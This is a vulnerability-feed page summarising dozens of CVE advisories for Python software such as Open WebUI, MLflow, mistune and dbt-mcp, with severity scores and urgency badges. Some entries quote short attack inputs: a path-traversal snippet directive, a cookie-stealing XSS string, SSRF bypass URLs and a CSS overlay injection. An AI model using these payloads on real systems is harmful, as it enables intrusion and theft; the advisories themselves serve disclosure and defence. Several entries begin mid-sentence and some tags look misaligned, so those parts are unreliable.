Path traversal in pymdownx.snippets versions 10.0.1 through 10.21.2 allows unauthenticated remote attackers to read arbitrary files from sibling directories outside the configured base_path, bypassing the restrict_base_path protection intended by CVE-2023-32309. The bypass exploits a string-prefix comparison introduced in PR #2039 that lacks directory-boundary enforcement, enabling a crafted snippet directive like '--8<-- "../docs_secret/leak.txt"' to escape the configured base directory when sibling paths share the same string prefix. Publicly available exploit code (proof-of-concept) exists in the GitHub Security Advisory; the vulnerability is not confirmed actively exploited in the CISA KEV catalog at time of analysis.

Microsoft Path Traversal Python
NVD GitHub
EPSS 0% CVSS 10.0
CRITICAL POC PATCH Act Now

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent attackers to execute arbitrary OS commands by chaining two unprotected API endpoints. The Next.js authentication middleware in src/proxy.js uses a narrow route allowlist that excludes /api/cli-tools/* and /api/mcp/*, letting an attacker register an arbitrary command via POST /api/cli-tools/cowork-settings and then trigger spawn() via GET /api/mcp/[plugin]/sse. Publicly available exploit code exists (PoC published with the GHSA advisory), with CVSS 10.0 reflecting maximum severity across confidentiality, integrity, and availability.

Python Denial Of Service Docker +1
NVD GitHub
EPSS 0% CVSS 3.1
LOW PATCH Monitor

Sensitive HTTP header values entered into the Strawberry GraphQL bundled GraphiQL IDE are serialized into the browser URL query string via JavaScript's history.replaceState, exposing credentials such as Authorization bearer tokens to browser history, copy-paste clipboard actions, and server/proxy/CDN access logs. Affected are strawberry-graphql versions 0.288.4 through 0.315.3 - any Python application exposing the default GraphiQL interface without explicit opt-out. No public exploit has been identified at time of analysis, and the CVSS score of 3.1 (Low) reflects that exploitation requires user interaction; however, in developer and staging environments where the IDE is commonly left enabled, token leakage via shared URLs or log aggregation is a realistic risk.

Information Disclosure Python
NVD GitHub VulDB
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Arbitrary file write via path traversal in Mailpit's `dump --http` subcommand (versions < 1.30.0) allows any HTTP server impersonating a Mailpit instance to write attacker-controlled bytes to arbitrary paths outside the intended output directory. The attacker controls both the file path (via the message ID field in the JSON response) and the file contents (via the raw message body endpoint), enabling writes anywhere the dumping user has write permission - including cron jobs, shell startup files, and CI artifact directories. Publicly available exploit code exists (Python PoC published in GHSA-qx5x-85p8-vg4j); no confirmed active exploitation at time of analysis.

Path Traversal Python RCE
NVD GitHub
EPSS 0%
CRITICAL Act Now

Server-side request forgery in the zrok Python SDK's ProxyShare component (versions 0.4.47 through 1.1.11) allows remote unauthenticated users to redirect proxied requests to arbitrary hosts by submitting absolute URLs in the request path. Because the Flask handler concatenates user input with the configured target via urllib.parse.urljoin, an attacker (Bob) can replace the share owner's (Alice's) intended target with any host including internal cloud metadata endpoints, and the response is returned to the attacker. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-jh67-hwqw-m5r7 documents the technique in detail.

Path Traversal Python
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Information disclosure in Algernon web server versions 1.17.6 and earlier allows unauthenticated remote attackers to retrieve full server-side source code, including embedded secrets, by triggering runtime errors in Lua, Pongo2, Amber, or HTML template handlers. When Algernon is started with a single file path (e.g. `algernon page.po2`), single-file mode unconditionally forces debug mode on, activating the PrettyError renderer which returns absolute file paths and complete file contents in HTTP 200 responses. Crucially, the `--prod` hardening flag does not block this behavior for non-`.lua` extensions, and publicly available exploit code exists in the GHSA advisory.

Microsoft Information Disclosure Python
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM PATCH This Month

Server-side request forgery in AutoGPT Platform versions 0.1.0 through 0.6.51 allows any authenticated user on a shared deployment to conduct non-blind internal network port scanning and service fingerprinting by exploiting the SendEmailBlock's unvalidated SMTP connection handling. The block accepts user-supplied smtp_server and smtp_port inputs and passes them directly to Python's smtplib.SMTP(), completely bypassing the platform's dedicated SSRF defenses - the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist in backend/util/request.py that every other block observes. Because smtplib surfaces TCP banners in exception messages that are persisted as visible block output, this is a non-blind SSRF, giving attackers readable reconnaissance data about internal hosts and services. No public exploit identified at time of analysis; vendor-released patch is confirmed in version 0.6.52.

Python SSRF
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL POC PATCH Act Now

Remote code execution in APScheduler (all versions through 3.10.x and 4.0.0a5) is achievable when applications deserialize attacker-controlled data via the bundled JSONSerializer or CBORSerializer. The unmarshal_object routine dynamically imports modules and invokes __setstate__ on arbitrary classes, letting an attacker pivot an untrusted payload into code execution; publicly available exploit code exists, though EPSS remains low at 0.06% (19th percentile).

Deserialization Python RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Local privilege escalation to arbitrary code execution in MLflow versions prior to 3.11.0 stems from insecure temporary directory permissions (0o777 and 0o770) created by NFS and model-download helpers. Any local user sharing the filesystem - particularly on Databricks where NFS is enabled by default - can overwrite cloudpickle-serialized model artifacts and gain code execution when another user's process deserializes them via cloudpickle.load(). No public exploit is identified at time of analysis, and the issue is a continuation of CVE-2025-10279 which was only partially fixed.

Python RCE
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Local file disclosure in NiceGUI versions <= 3.11.1 allows remote unauthenticated attackers to read arbitrary files accessible to the server process when applications pass user-controlled content to ui.restructured_text(). The flaw stems from Docutils being invoked without disabling file-insertion directives (include, csv-table :file:, raw :file:), enabling exfiltration of secrets, credentials, and source code. No public exploit identified at time of analysis, but the vendor advisory provides full directive-level proof patterns.

Information Disclosure Kubernetes Python +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote denial-of-service in OpenTelemetry eBPF Instrumentation (OBI) versions 0.7.0 through 0.8.x allows unauthenticated attackers to crash the privileged instrumentation process by sending a crafted memcached storage command with an oversized `<bytes>` field. The integer overflow in the memcached text protocol parser produces a negative payload length that triggers a Go runtime panic in LargeBufferReader.Peek, halting telemetry collection until OBI is restarted. Publicly available exploit code exists in the GHSA-43g7-cwr8-q3jh advisory, but there is no public exploit identified beyond the PoC and the vulnerability is not listed in CISA KEV.

Docker RCE Denial Of Service +3
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Remote code execution in the amazon-redshift-python-driver (versions prior to 2.1.14) allows a malicious or compromised Redshift server, or a man-in-the-middle attacker positioned on the network path, to execute arbitrary Python code on any client that connects. The root cause is unsafe use of Python's eval() against untrusted server-supplied data inside the vector_in() function. No public exploit identified at time of analysis, but the CVSS 4.0 base score of 9.3 and PR:N/UI:N vector make this a high-priority client-side supply-chain-style risk.

Code Injection Python RCE
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.

PostgreSQL Docker Python +2
NVD GitHub VulDB
EPSS 0% CVSS 10.0
CRITICAL Act Now

{tenant}/databases/{db}/collections endpoint. The flaw carries a maximum CVSS 4.0 score of 10.0 and was disclosed publicly by HiddenLayer; no public exploit identified at time of analysis, though detailed research has been published.

RCE Code Injection Python +1
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

SGLangs multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation.

Python RCE Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL POC Act Now

python jsonpickle 2.0.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary Python commands by deserializing malicious JSON payloads containing py/repr objects. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Python RCE Deserialization +2
NVD Exploit-DB GitHub VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Budibase's REST datasource integration before version 3.38.1 bypasses IP blacklist security controls through HTTP redirect following. Authenticated Builder-level users can exploit this to access cloud metadata services and internal databases by redirecting requests through attacker-controlled servers, potentially stealing AWS/GCP/Azure credentials. This vulnerability class was previously fixed in automation steps but the REST integration was overlooked, creating an inconsistent security posture.

Redis Python SSRF +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

{filename:path} endpoint fails to validate paths containing %2F-encoded directory separators, bypassing Starlette's URL normalization. Fixed in version 1.2.0 with no public exploit identified at time of analysis.

Path Traversal Python SSH
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM POC PATCH This Month

Archive extraction boundary failure in Microsoft APM's legacy-bundle probe allows local attackers to overwrite arbitrary files on Windows systems running Python 3.10 or 3.11. When users run 'apm install' on a malicious .tar.gz file, untrusted tar members bypass path validation, enabling absolute path writes (e.g., D:/...) that compromise system integrity. Fixed in version 0.13.0. No active exploitation confirmed at time of analysis, but the local attack vector with user interaction required (CVSS AV:L/UI:R) limits real-world risk to social engineering scenarios targeting AI agent developers on Windows platforms.

Path Traversal Python Microsoft
NVD GitHub VulDB
EPSS 0% CVSS 8.6
HIGH POC PATCH This Week

Authentication bypass in MLflow 3.9.0 and earlier allows unauthenticated remote attackers to access protected Job API and OpenTelemetry trace ingestion endpoints when the server runs with basic-auth enabled via uvicorn/ASGI. Attackers can submit jobs, read results, cancel operations, and inject trace data without credentials. The FastAPI permission middleware incorrectly enforced authentication only on /gateway/ routes, leaving /ajax-api/3.0/jobs/* and /v1/traces unprotected due to architectural mismatch between Flask and FastAPI authentication mechanisms. Fixed in version 3.10.0 with GitHub commit bb62e77 adding proper validators for all FastAPI routes.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 7.7
HIGH POC PATCH This Week

python-utcp CLI subprocess environment passes all process-level secrets to every tool call. When chained with CVE-2026-45369 command injection, remote authenticated attackers with low-privilege LLM tool access can exfiltrate AWS credentials, API keys, database URLs, and other environment variables in a single HTTP request. Patch available in version 1.1.2 (NVD references 1.1.3 as fixed version). GitHub security advisory confirms proof-of-concept demonstrating credential theft via env dump to attacker-controlled endpoint.

Python Information Disclosure
NVD GitHub VulDB
EPSS 0% CVSS 8.3
HIGH POC PATCH This Week

Command injection in python-utcp allows remote attackers to execute arbitrary shell commands on Unix and Windows systems when user-controlled tool arguments are processed by the CLI communication protocol module. The _substitute_utcp_args method in cli_communication_protocol.py directly embeds unsanitized user input into bash or PowerShell commands without escaping, enabling full remote code execution. Vendor-released patch available in version 1.1.2 with shell-quoting mitigation (shlex.quote on Unix, single-quoted literals on Windows). CVSS 8.3 indicates high complexity and required user interaction, but scope change enables container/sandbox escape scenarios. No public exploit code or CISA KEV listing identified at time of analysis, though detailed proof-of-concept exists in the GitHub security advisory demonstrating data exfiltration via curl.

Python Microsoft Command Injection
NVD GitHub VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Server-Side Request Forgery in @utcp/http <= 1.1.1 allows remote attackers to redirect tool invocations to internal services via malicious OpenAPI specs. An attacker hosting a malicious OpenAPI specification on a legitimate HTTPS endpoint can declare internal server URLs (e.g., http://127.0.0.1:9090 or http://169.254.169.254) in the servers array; the OpenApiConverter blindly trusts these URLs without revalidation during tool invocation, enabling access to cloud metadata endpoints, internal databases, and loopback services. Additionally, a prefix-bypass in hostname validation (startsWith check) allows URLs like http://localhost.evil.com to bypass discovery-time restrictions. Patch version 1.1.2 is available.

Redis SSRF Python +3
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Multiple concurrent LDAP or OAuth first-login requests on a freshly deployed Open WebUI instance can all receive administrator privileges through a TOCTOU race condition in role assignment logic. The vulnerability affects deployments using LDAP or OAuth authentication on instances with no existing users. While the regular signup handler was explicitly patched for this race condition in earlier code ('Insert with default role first to avoid TOCTOU race'), the LDAP and OAuth authentication paths were never updated with the same fix. Vendor-released patch available in version 0.9.0 (April 2026). No active exploitation confirmed (not in CISA KEV), though publicly available exploit code exists per GitHub advisory GHSA-h3ww-q6xx-w7x3. CVSS 8.1 (High) reflects network attack vector but requires high attack complexity (precise timing of concurrent requests during narrow first-deployment window).

Privilege Escalation Python
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Open WebUI versions through 0.8.11 allow authenticated users to execute arbitrary Python code in the Jupyter container by bypassing the ENABLE_CODE_EXECUTION=false configuration flag. The /api/v1/utils/code/execute endpoint fails to enforce the admin-configured feature gate (CWE-863: Incorrect Authorization), enabling any verified user to run code even when administrators believe execution is disabled. The vulnerability is confirmed by vendor POC (verified 2026-03-25) demonstrating successful code execution, file access, and SSRF to internal Docker services despite explicit admin configuration disabling the feature. Vendor-released patch available in v0.8.12 (commit 6d736d3c5) enforces the configuration check before dispatching code to Jupyter.

SSRF Authentication Bypass Python +2
NVD GitHub
EPSS 0% CVSS 8.0
HIGH PATCH This Week

{id}/files to any user with read access. This affects all default Docker deployments where chat sharing is enabled. Vendor-released patch available in v0.9.0 (commit 2e52ad8ff). No active exploitation confirmed (not in CISA KEV). CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H scores 8.0, though real-world impact extends beyond confidentiality to permanent data destruction with no recovery mechanism.

Authentication Bypass Python Docker
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

URL parser mismatch in Open WebUI allows authenticated users to bypass SSRF protections and access internal network resources. The validate_url function uses Python's urlparse library to extract hostnames for validation, while the requests library handles actual HTTP requests. These libraries disagree on parsing URLs containing backslash characters (e.g., http://127.0.0.1:6666\@1.1.1.1), allowing attackers to craft URLs that pass validation as external addresses but resolve to internal hosts. Exploitation requires low-privilege authentication but no user interaction, enabling access to cloud metadata endpoints and internal services. Fixed in version 0.9.5 per GitHub advisory GHSA-8w7q-q5jp-jvgx.

Google SSRF Microsoft +1
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

{task_id}. Attackers can disrupt system-wide chat generation and background processing by continuously canceling active tasks across the multi-user instance. Publicly available exploit code exists. Vendor-released patch in v0.9.0 restricts global task endpoints to admin-only and introduces a scoped /api/tasks/chat/{chat_id}/stop endpoint for legitimate user-owned task termination. CVSS 7.1 (AV:N/AC:L/PR:L/UI:N) reflects network-accessible, low-complexity exploitation requiring only authenticated low-privilege access, with high availability impact and low confidentiality impact from task enumeration.

Authentication Bypass Redis Privilege Escalation +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Insecure Direct Object Reference (IDOR) in Open WebUI's retrieval API allows authenticated users to bypass knowledge base access controls and directly access, modify, or delete other users' private knowledge bases by supplying the target UUID as a collection name. The authorization gap affects seven endpoints: two read endpoints (/query/doc, /query/collection) permit exfiltration of private knowledge base content, while five write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube) enable content injection, poisoning, or complete data destruction via overwrite. Affects Open WebUI <= 0.9.4; fixed in v0.9.5 via PR #22109. EPSS data not available; no confirmed active exploitation (CVSS 7.5 reflects AC:H due to UUID prerequisite, but UUIDs leak through multiple channels per researcher analysis).

Authentication Bypass Python Docker
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM POC PATCH This Month

Open WebUI's GET /api/v1/retrieval/ endpoint discloses RAG pipeline configuration including embedding models, chunking parameters, and RAG templates to unauthenticated attackers with a single HTTP request. The vulnerability affects v0.9.2 and earlier, where this endpoint lacks authentication guards present on all adjacent endpoints, enabling reconnaissance for RAG poisoning attacks and infrastructure fingerprinting without requiring credentials, authentication tokens, or user interaction.

Authentication Bypass Python Microsoft +1
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Mass assignment vulnerability in Open WebUI v0.9.2 allows authenticated attackers to spoof user identities and manipulate model evaluation data by injecting a `user_id` field into feedback requests. The `POST /api/v1/evaluations/feedback` endpoint fails to properly validate and segregate server-set values from user-supplied input, enabling attackers to create feedback records attributed to arbitrary users and corrupt Elo-based model leaderboard rankings. Patch available in v0.9.5.

Python RCE
NVD GitHub
EPSS 0% CVSS 7.2
HIGH PATCH This Week

{id}/update) fails to enforce the workspace.tools authorization check that gates code execution, allowing users explicitly denied code execution capabilities to bypass this security boundary. This breaks Open WebUI's documented trust model where workspace.tools permission is intentionally disabled by default and 'equivalent to giving them shell access to the server.' Exploitation achieves root code execution (PID 1) in default Docker deployments, enabling extraction of secrets (WEBUI_SECRET_KEY, API keys), database access, and filesystem read/write. Confirmed by GitHub security advisory GHSA-p4fx-23fq-jfg6. No public exploit or KEV listing at time of analysis, but detailed proof-of-concept with Burp Collaborator confirmation exists in the advisory.

Microsoft Python RCE +2
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Modify messages from any channel member in Open WebUI v0.8.12 through v0.9.4 via Insecure Direct Object Reference (IDOR) in the message update API endpoint. Any authenticated user with group or direct message channel membership can tamper with messages sent by other members, including administrators, by bypassing message ownership verification. Publicly available exploit code exists demonstrating the vulnerability; patch available in v0.9.5.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Open WebUI versions 0.8.10 and earlier allow authenticated users to bypass model access control by appending ?bypass_filter=true to POST requests to /openai/chat/completions or /ollama/api/chat endpoints. The vulnerability exposes an internal-only FastAPI function parameter to external HTTP clients via query string binding, permitting any authenticated user to invoke admin-restricted models regardless of their assigned access grants. Vendor-released patch: v0.8.11 (March 2026). No public exploit code identified beyond the PoC in the advisory, but exploitation is trivial for any authenticated user.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in Open WebUI versions ≤0.8.12 allows authenticated users with OAuth access to force the server to make HTTP requests to arbitrary internal resources and exfiltrate complete response data. Exploitation requires OAuth-enabled deployments with ENABLE_OAUTH_SIGNUP=true or OAUTH_UPDATE_PICTURE_ON_LOGIN=true. An attacker controls the OAuth provider's 'picture' claim URL, triggering server-side HTTP requests to cloud metadata services (AWS IMDS), localhost services (Redis, Elasticsearch), or internal network endpoints. The full response is base64-encoded and stored in the user's profile_image_url field, enabling complete data exfiltration. Fixed in version 0.9.0 per GitHub advisory GHSA-24c9-2m8q-qhmh. EPSS data not available; no CISA KEV listing indicates limited widespread exploitation, though publicly available proof-of-concept exists in the GitHub advisory.

Redis SSRF Python +2
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Server-Side Request Forgery in Open WebUI's `validate_url()` function allows authenticated attackers to reach internal IPv4/IPv6 addresses, bypassing security controls via three distinct flaws: the validators library silently fails on IPv6 private-address checks (raising ValidationError which evaluates as falsy), IPv4-mapped IPv6 addresses (::ffff:10.0.0.1) evade IPv4 filtering entirely, and multiple IANA-reserved IPv4 ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.0.0/24, 198.18.0.0/15, 203.0.113.0/24) remain unblocked. The vulnerability persists in the RAG web search, image editing, and other endpoints despite an earlier incomplete remediation attempt (CVE-2025-65958), enabling exfiltration of AWS IMDSv1 credentials and access to localhost-bound services. Publicly available exploit code exists (demonstrated POC in advisory), affecting Open WebUI ≤0.8.12 with fix released in version 0.9.0.

Python SSRF
NVD GitHub
EPSS 0% CVSS 3.5
LOW PATCH Monitor

{id}/pin endpoint, which incorrectly checks for read permission instead of write permission. This privilege escalation enables read-only users to perform a write operation (toggling is_pinned state) that should be restricted to users with explicit write access. The vulnerability is limited to the pin operation and does not permit modification of note content, title, or access grants. Publicly available proof-of-concept demonstrates the bypass across all shared notes with read access.

Authentication Bypass Python Privilege Escalation
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting (XSS) in Open WebUI ≤0.9.2 allows authenticated users with default speech-to-text permissions to upload polyglot WAV+HTML files through the audio transcription endpoint, achieving code execution in victim browsers and enabling full account takeover including administrator sessions. The vulnerability chains insecure file extension handling with unrestricted Content-Type serving and non-HttpOnly JWT storage to weaponize a single-click attack. Publicly available exploit code exists with video demonstration; no active exploitation confirmed by CISA KEV at time of analysis. CVSS 8.7 (High) reflects changed scope (S:C) and user interaction requirement, but real-world risk is elevated because the vulnerable permission defaults to enabled and the attack yields immediate admin-level access in typical deployments.

XSS RCE Python
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Authenticated admin users in pyLoad-ng can bypass the CVE-2026-33509 fix by setting the storage_folder to the Flask session directory (/tmp/pyLoad/flask), then downloading and reusing session files of other users via the /files/get/ endpoint to achieve account takeover. The original patch failed to block access to the session cache directory, leaving it accessible through the directory traversal protection bypass. Publicly available proof-of-concept code confirms the bypass is functional.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

{user_id}/profile/image endpoint, executes scripts with access to localStorage and enables full account takeover of any user viewing the malicious profile image, including administrators. Two independent reporters demonstrated distinct vectors: one via HTML data URIs in new tabs (limited scope), and one via SVG data URIs served by the application origin (account takeover). No public exploit code or active exploitation has been confirmed, but the vulnerability requires only authenticated access and user interaction (viewing a profile image).

XSS Python
NVD GitHub
EPSS 0% CVSS 6.4
MEDIUM PATCH This Month

Remote authenticated actors with S3 write access can achieve code execution in Amazon SageMaker Triton inference containers by replacing model artifacts with malicious pickle payloads that are deserialized without integrity verification. Affected versions are SDK v2 before v2.257.2 and v3 before v3.8.0. The vulnerability requires high-privilege S3 access to the model artifact path but carries severe impact including arbitrary code execution within inference containers. No public exploit code or active exploitation has been identified at time of analysis.

Python RCE
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Cleartext HMAC signing key exposure in Amazon SageMaker Python SDK versions <2.257.2 and <3.8.0 enables authenticated attackers with SageMaker describe API and S3 write permissions to forge model artifact integrity signatures and achieve remote code execution in inference containers. AWS released patches in v2.257.2 and v3.8.0 with security fixes addressing Triton HMAC key exposure and missing integrity checks. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, suggesting limited exploitation activity despite high CVSS score.

Python RCE
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH This Week

Authenticated server-side request forgery in ApostropheCMS allows low-privilege users to force the server to fetch arbitrary internal URLs through the rich-text widget import flow. Attackers with content editing permissions can exfiltrate internal data by crafting malicious image tags that trigger server-side fetch operations, with image-compatible responses being persisted and re-hosted by the application. Publicly available exploit code exists (full Python PoC published in GitHub advisory GHSA-pr28-mf3q-qpg6), enabling immediate weaponization. All versions through 4.29.0 are affected with no vendor-released patch identified at time of analysis, creating sustained exposure for organizations running this popular Node.js CMS.

Python SSRF
NVD GitHub
EPSS 0% CVSS 3.1
LOW PATCH Monitor

dbt-mcp DefaultUsageTracker transmits unredacted MCP tool arguments-including raw SQL queries and credential-bearing --vars JSON-to dbt Labs telemetry by default without user opt-in. Affects dbt-mcp ≤1.17.0; tracking is enabled unless users explicitly set DBT_SEND_ANONYMOUS_USAGE_STATS=false or DO_NOT_TRACK=1 before installation, creating silent exfiltration of potentially sensitive database schema, credentials, and personally identifiable information. The vulnerability has been verified by proof-of-concept source code analysis and execution against dbt-mcp v1.15.1.

Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 2.5
LOW PATCH Monitor

dbt MCP Server logs complete tool arguments including SQL queries and database credentials in plaintext to disk when file logging is enabled. Versions up to 1.17.0 write unredacted arguments from every tool invocation to dbt-mcp.log, with sensitive data such as raw SQL queries, credential-bearing vars payloads, and node selectors persisting indefinitely without automatic rotation. A local attacker with read access to the log file can extract credentials and SQL logic. Publicly available proof-of-concept demonstrates credential and PII extraction from log files.

Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Argument injection in dbt-mcp v1.15.1 through v1.17.0 allows MCP clients to inject arbitrary dbt command-line flags such as --profiles-dir, --project-dir, and --target via unsanitized node_selection and resource_type parameters, enabling attackers to redirect dbt's configuration and database operations to attacker-controlled locations. The vulnerability is exploitable via two independent vectors in the _run_dbt_command() function and has been verified by proof-of-concept code demonstrating arbitrary dbt profile injection. Vendor-released patch available in v1.17.1.

Python RCE
NVD GitHub
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

CSS injection in mistune's Image directive plugin allows unauthenticated remote attackers to inject arbitrary CSS properties via the :width: or :height: options in fenced image directives, enabling full-page phishing overlays and UI redressing attacks. The vulnerability stems from a prefix-only regex validation (_num_re.match() with no end-of-string anchor) that accepts values like '100vw;position:fixed;background-color:#e11d48;...' and renders them unescaped into style= attributes. Confirmed fixed in v3.2.1; publicly available proof-of-concept demonstrates full-viewport colored overlay generation from a single malicious :width: directive.

XSS Apple Python +1
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in mistune's render_toc_ul() function allows attackers to inject arbitrary HTML and JavaScript into table-of-contents output by crafting malicious heading IDs. When heading identifiers are derived from user-supplied text (standard practice for readable slug anchors), an attacker can break out of the href attribute context with a payload like `x"><script>alert(document.cookie)</script><a href="`, causing the script block to execute in the rendered TOC. The vulnerability requires user interaction (UI:R) to view the poisoned TOC but affects all users of the generated page. Vendor-released patch available in mistune 3.2.1.

XSS Apple Python +1
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in HuggingFace Diffusers library (versions < 0.38.0) allows attackers to execute arbitrary Python code when victims load malicious pipelines from Hugging Face Hub repositories. The vulnerability bypasses the trust_remote_code=True safeguard through a type coercion flaw where None values are interpolated as 'None.py' filenames. Attackers can achieve silent code execution by publishing repositories containing a malicious None.py file alongside legitimate-looking configuration, requiring only that victims call DiffusionPipeline.from_pretrained() on the attacker's repository. EPSS data not available; no public exploit identified at time of analysis. Vendor-released patch: version 0.38.0.

Python Code Injection RCE
NVD GitHub
EPSS 0% CVSS 6.2
MEDIUM PATCH This Month

pyzipper before version 0.4.0 fails to use AE-2 encryption format due to an operator precedence bug, causing CRC32 checksums to be stored unencrypted in ZIP headers. Attackers with access to encrypted archives can extract plaintext CRC32 values and conduct brute-force attacks on small or low-entropy files to recover their content without decrypting the AES encryption itself. Large or high-entropy files remain practically safe under current computational constraints, but the vulnerability represents a cryptographic bypass for files under approximately 20 bytes.

Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 8.1
HIGH This Week

Privilege escalation in wger fitness manager allows gym trainers to impersonate gym managers via session-chain attack. An authenticated trainer exploits flawed session-flag logic in the trainer-login endpoint to bypass permission checks - first switching into a low-privilege user, then leveraging the inherited 'trainer.identity' session flag to hop into manager accounts. Publicly available proof-of-concept demonstrates complete takeover of gym administration with CVSS 8.1 (network-accessible, low complexity). No vendor patch confirmed at time of analysis; vulnerability actively disclosed by wger-project GitHub advisory GHSA-9qpr-vc49-hqg2. EPSS score not available, not in CISA KEV. Root cause is CWE-269 (improper privilege management) in core/views/user.py lines 169-178.

Privilege Escalation Python
NVD GitHub
EPSS 0% CVSS 7.5
HIGH This Week

{id}/logs/ and /api/v2/routine/{id}/stats/ endpoints. Detailed proof-of-concept with Python exploit confirms trivial exploitation against wger <= 2.5.0a2. CVSS 7.5 rates this High severity, but NOTE: vector PR:N appears inconsistent with authenticated-only access described - attackers need valid credentials, suggesting actual vector should be PR:L. EPSS data not available. No CVE KEV listing or public exploit repositories identified beyond GitHub advisory disclosure. Patch status unconfirmed - GitHub advisory references fix commit but no released version number provided in available data.

Authentication Bypass Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Local code execution in the claude-code-cache-fix npm package (v3.5.0 and v3.5.1) lets attacker-controlled filesystem path names run arbitrary Python inside a victim's Claude Code process. The bundled tools/quota-statusline.sh interpolates Claude Code's statusline hook stdin — which reflects user-controlled paths such as cwd, workspace.current_dir, workspace.project_dir, and transcript_path — directly into a Python triple-quoted literal, so a directory name containing the byte sequence ''' closes the literal early and executes following bytes as Python at the user's privilege on every statusline redraw. A working injection payload is publicly available exploit code (published in the GHSA advisory and the T6/T7 regression tests); the issue is not listed in CISA KEV and no EPSS score was provided.

Python Node.js Command Injection +1
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Unsafe deserialization in LangSmith SDK's prompt pull methods allows remote attackers to execute server-side request forgery (SSRF) and redirect LLM traffic to attacker-controlled infrastructure when applications pull public prompts from LangSmith Hub. The SDK deserializes untrusted prompt manifests containing serialized LangChain objects with attacker-controlled constructor arguments, including malicious base_url configurations, custom headers, and secret references. Exploitation requires user interaction (developers must call pull_prompt with a malicious owner/name identifier), but no authentication is required to publish malicious prompts to the public Hub. Vendor-released patches in Python >= 0.8.0 and JS/TS >= 0.6.0 now block public prompt pulling by default, requiring explicit opt-in via dangerously_pull_public_prompt flag. EPSS data not available; no CISA KEV listing or public exploit identified at time of analysis.

Python SSRF Deserialization +1
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Unauthenticated open redirect in Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoints allows remote attackers to redirect users to attacker-controlled URLs by submitting authorization requests that omit the openid scope. The vulnerability occurs because scope validation happens before redirect_uri validation, allowing the error handler to return an HTTP 302 with an unvalidated attacker-supplied redirect_uri. A proof-of-concept GET request demonstrates the flaw trivially; no authentication, valid client_id, or user interaction beyond clicking the link is required, though the CVSS score of 6.1 reflects the requirement for user interaction (UI:R) to click the phishing link. Actively exploited in the wild (KEV status), this is a Medium-severity open redirect enabling credential harvesting attacks.

Python CSRF Open Redirect
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

